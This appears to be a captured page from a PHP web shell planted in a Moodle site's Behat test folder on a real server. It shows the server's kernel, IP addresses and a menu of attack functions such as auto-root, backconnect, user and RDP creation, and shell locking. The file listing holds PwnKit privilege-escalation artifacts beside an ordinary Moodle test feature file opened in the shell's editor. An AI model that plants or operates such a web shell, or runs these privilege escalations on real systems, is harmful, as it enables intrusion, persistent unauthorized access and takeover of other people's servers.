Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
admin /
tool /
task /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
behat_tool_task.php
1.93
KB
-rwxrwxrwx
clear_fail_delay.feature
1.46
KB
-rwxrwxrwx
manage_tasks.feature
4.06
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : clear_fail_delay.feature
@tool @tool_task Feature: Clear scheduled task fail delay In order to stop failures from delaying a scheduled task run As an admin I need to be able to clear the fail delay on a task Background: Given the scheduled task "\core\task\send_new_user_passwords_task" has a fail delay of "60" seconds And I log in as "admin" And I navigate to "Server > Tasks > Scheduled tasks" in site administration Scenario: Any fail delay is highlighted Then I should see "60" in the "Send new user passwords" "table_row" And I should see "Clear" in the "Send new user passwords" "table_row" And I should see "60" in the "td.table-danger" "css_element" Scenario: Clear fail delay When I click on "Clear" "text" in the "Send new user passwords" "table_row" And I should see "Are you sure you want to clear the fail delay" And I press "Clear" Then I should not see "60" in the "Send new user passwords" "table_row" And I should not see "Clear" in the "Send new user passwords" "table_row" And I should see "Send new user passwords" in the "tr.table-primary" "css_element" Scenario: Cancel clearing the fail delay When I click on "Clear" "text" in the "Send new user passwords" "table_row" And I press "Cancel" Then I should see "60" in the "Send new user passwords" "table_row" And I should see "Clear" in the "Send new user passwords" "table_row" And I should see "Send new user passwords" in the "tr.table-primary" "css_element"
Close